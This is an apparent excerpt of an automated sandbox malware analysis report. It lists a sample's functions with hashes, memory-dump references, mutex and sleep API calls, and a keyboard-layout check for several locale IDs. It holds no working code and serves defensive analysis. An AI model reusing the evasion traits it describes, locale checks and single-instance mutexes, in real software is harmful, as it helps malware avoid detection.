Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: ConditionVariableWake
String ID:
API String ID: 1192502693-0
Opcode ID: 52c3e671c7df4ad3ae9bb151ee66a587b7fc0285729e64ac81cd53fc1b5e6c58
Instruction ID: 53cb11242b545f4d873ba7665c75e48078823b2e8a7a21c787e4e2ae5ca1903d
Opcode Fuzzy Hash: 52c3e671c7df4ad3ae9bb151ee66a587b7fc0285729e64ac81cd53fc1b5e6c58
Instruction Fuzzy Hash: 88725871A14248DBDF08EF68DC86B9DBBA6EB45314F604258FC05973C1DB359A88CBB1

Function 00D8652B Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00D8652A,?,?,?,?,?,00D87661), ref: 00D86567

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 970e625d868624031d47bd55351d9fad9da3fb05b5d6c7a1acee11dfe2af97cc
Instruction ID: fbee776a9f6958159392b9a6ef17232b3615d272f057585b897e26bb4672e850
Opcode Fuzzy Hash: 970e625d868624031d47bd55351d9fad9da3fb05b5d6c7a1acee11dfe2af97cc
Instruction Fuzzy Hash: 7AE08C30000108AECF297B18CC4DA4C3B6AEF01761F540840F9095A222CB25ED82C7A0

Function 05430112 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2363034422.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5430000_8WYS1MQTL0QCOHKIPL8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00d77a01e17754021ae4601e25741fa80a067985cad3b2541c7c52b305b2885c
Instruction ID: 6a332a991ae85349844e671b7033ea390c329f37011cec6ba06930a1f4caea18
Opcode Fuzzy Hash: 00d77a01e17754021ae4601e25741fa80a067985cad3b2541c7c52b305b2885c
Instruction Fuzzy Hash: 67112CA700C114ADE702C446AA1F5F7677BE6CA7307308617F80BC6562D3A1494B5171

Function 00D55C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

0000043f, xrefs: 00D5612B
00000419, xrefs: 00D56098
Keyboard Layout\Preload, xrefs: 00D56054
00000422, xrefs: 00D560C9
00000423, xrefs: 00D560FA

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 6e46406fcd71323ca1eef6574db1764928f1db5a22868f62e0e50198363e856e
Instruction ID: 19697803a2e13e3ca37c8d593f8d0e8f75560cf7ef9e7e724b5110e4f803b7e3
Opcode Fuzzy Hash: 6e46406fcd71323ca1eef6574db1764928f1db5a22868f62e0e50198363e856e
Instruction Fuzzy Hash: EDF1D171A002589FDF24DF58CC85BDEBBB9EF45304F504699F908A72C1DB749A88CBA1

Function 00D59BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D5A963
CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1cfbbcbbcb25b9827f5b920d6b432201a84d06d757fdfe646d1551a38d733f9a
Instruction ID: 5c880569203ce0d49f4a155176a14852820c84722b97c53e5585ea5237774304
Opcode Fuzzy Hash: 1cfbbcbbcb25b9827f5b920d6b432201a84d06d757fdfe646d1551a38d733f9a
Instruction Fuzzy Hash: E6312371A04204CBEF18DB6CDC9976DFBA2EB86311F248318EC149B3D5C77589888B72

Function 00D59F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D5A963
CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3cedfc488f286cdd1926e25d68592594bef61c2b579e14d1be155162f7b199dd
Instruction ID: c970bbccfec9b1556d663781131318a17af919fa774e4a6a3cc973e305f0c535
Opcode Fuzzy Hash: 3cedfc488f286cdd1926e25d68592594bef61c2b579e14d1be155162f7b199dd
Instruction Fuzzy Hash: 71311231A14214CBEF18DB6CD8997ADB7A2EF86311F248718EC14DB2D5C77589888B72

Function 00D5A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D5A963
CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f9ae7e6a2461663ac376c9a2fec4dc124e3894aa382b9035a19bb33f3e72f48c
Instruction ID: 3810f957bb5ec70d02a50cce21716907d053182bf53a42a89e227a5c8d44ee2e
Opcode Fuzzy Hash: f9ae7e6a2461663ac376c9a2fec4dc124e3894aa382b9035a19bb33f3e72f48c
Instruction Fuzzy Hash: 03313731B142109BEF18DBACDC85B6DB7A2DB85311F248319EC149B3D5C77599888B32

Function 00D5A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D5A963
CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
